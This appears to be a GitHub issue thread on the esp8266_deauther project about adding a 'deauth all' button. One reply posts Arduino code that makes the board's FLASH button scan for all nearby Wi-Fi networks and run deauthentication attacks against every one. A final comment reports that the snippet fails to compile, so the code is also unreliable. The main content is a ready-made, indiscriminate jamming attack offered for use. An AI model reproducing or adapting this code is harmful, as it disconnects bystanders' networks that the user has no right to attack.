SpacehuhnTech/esp8266_deauther #906: Deauth All Button

Omar7u7, 2018-06-27:
What do I have to modify in the code to make a deauth all button?

spacehuhn, 2018-06-28:
Since you know about the deauth all button, I suspect you watched my video about it. There is everything explained.

vuong244, 2018-07-22:
**In the end of setup():** 

    // version
    prntln(settings.getVersion());
    pinMode(D4, OUTPUT);

**_In the beginning of loop():_**

    if (!booted) {
        // reset boot counter
        EEPROM.write(0, 0);
        EEPROM.commit();
        booted = true;
    }
    if(digitalRead(0)== LOW){
      if(!attack.isRunning()){
      serialInterface.runCommand("stopap");                    
      serialInterface.runCommand("scan aps -c 60s");           
      serialInterface.runCommand("attack -da -b");             
      digitalWrite(D4, LOW);                                   
      }
      else{
      scan.stop();             
      attack.stop();           
      digitalWrite(D4, HIGH);  
    }}}

**in the A_config.h:**

```
#define BUTTON_UP 12
#define BUTTON_DOWN 13
#define BUTTON_A 14
#define GPIO0
```

Press the "FLASH" button, will automatically find and attack all the wifi network around (deauth all)

joshephcharlie, 2018-11-23:
esp8266_deauther:159:7: error: 'serialInterface' was not declared in this scope

       serialInterface.runCommand("stopap");                    // stop access point and web interface